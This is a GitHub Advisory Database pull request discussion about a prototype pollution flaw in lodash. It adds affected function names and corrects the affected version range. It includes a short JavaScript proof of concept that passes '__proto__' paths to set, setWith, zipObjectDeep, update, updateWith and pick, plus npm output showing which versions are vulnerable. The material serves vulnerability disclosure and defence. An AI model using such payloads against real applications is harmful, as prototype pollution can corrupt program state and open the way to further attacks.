[GHSA-p6mc-m468-83gw] Prototype Pollution in lodash

[jkmartindale]

Updates

• Affected products
• Description
• References

Comments

Added function names

The root cause of this vulnerability is internal function baseSet, which is used by multiple public functions in addition to zipObjectDeep. This pull request adds those additional vulnerable functions to the description, as they may not be obvious to analysts determining if their codebase is affected. For example, https://hackerone.com/reports/864701 is essentially a duplicate of the HackerOne report that created this CVE due to the shared root cause. However, it was awarded a bounty (and received a separate Snyk entry) because it is not obvious from the older HackerOne disclosure or CVE description that set and setWith are also affected by the same bug.

This is the PoC I've been using to check affected versions:

// run.js
_ = require('lodash')
console.log(`Lodash version ${_.VERSION}`)
try {
    _.set({}, "__proto__.test1", "set() vulnerable")
    console.log(test1)
} catch{}
try {
    _.setWith({}, "__proto__.test2", "setWith() vulnerable")
    console.log(test2)
} catch{}
try {
    _.zipObjectDeep(["__proto__.test3"], ["zipObjectDeep() vulnerable"])
    console.log(test3)
} catch{}
try {
    _.update({}, "__proto__.test4", (x) => "update() vulnerable")
    console.log(test4)
} catch{}
try {
    _.updateWith({}, "__proto__.test5", (x) => "updateWith() vulnerable", Object)
    console.log(test5)
} catch{}
try {
    _.pick({ __proto__: { test6: "pick() vulnerable" } }, ["__proto__.test6"])
    console.log(test6)
} catch{}
console.log("Tests complete.")

For completeness' sake, pickBy also uses baseSet, but it isn't vulnerable because it iterates over a list of enumerable properties and doesn't access arbitrary paths provided in the function call.

Affected versions

Lower bound

The above PoC found that the oldest vulnerable version of Lodash is 3.7.0, which introduces the set function (with vulnerable functionality eventually moving to baseSet). All the other vulnerable functions were added later. pick is technically older than set but its behavior matches that of the not vulnerable pickBy until lodash/lodash@fd526e8 in v4.0.0.

Upper bound

The PoC above found that the fix was added in 4.17.17:

$ npm install [email protected] && node run.js

added 1 package, and audited 3 packages in 3s

found 0 vulnerabilities
Lodash version 4.17.16
set() vulnerable
setWith() vulnerable
zipObjectDeep() vulnerable
update() vulnerable
updateWith() vulnerable
pick() vulnerable
Tests complete.

$ npm install [email protected] && node run.js

changed 1 package, and audited 3 packages in 4s

found 0 vulnerabilities
Lodash version 4.17.17
Tests complete.

4.17.17 also matches the patch version listed in SNYK-JS-LODASH-608086, which was created in response to the second HackerOne disclosure of this vulnerability.

However the Lodash changelog lists the fix under 4.17.19 and says that versions 4.17.16–4.17.18 were corrupted (which doesn't match my current experience, but whatever).

lodash-es doesn't have releases for versions 4.17.16–4.17.19, so its earliest patched version would be 4.17.20. I was unable to find an issue in this repository explaining the discrepancy in affected version between the advisory details (4.17.19) and metadata (4.17.20), but I'm assuming it's because NVD has no way to differentiate lodash and lodash-es given that they're the same library with differing packaging.

References

Replaced the link to a deleted GitHub issue with an archive link and added a link to https://hackerone.com/reports/864701, which is a second disclosure for this vulnerability focusing on set and setWith.

[darakian]

Many thanks for the contribution, the great write up and concise POC. I'll add this PR as a reference as well 👍

[advisory-database]

Hi @jkmartindale! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!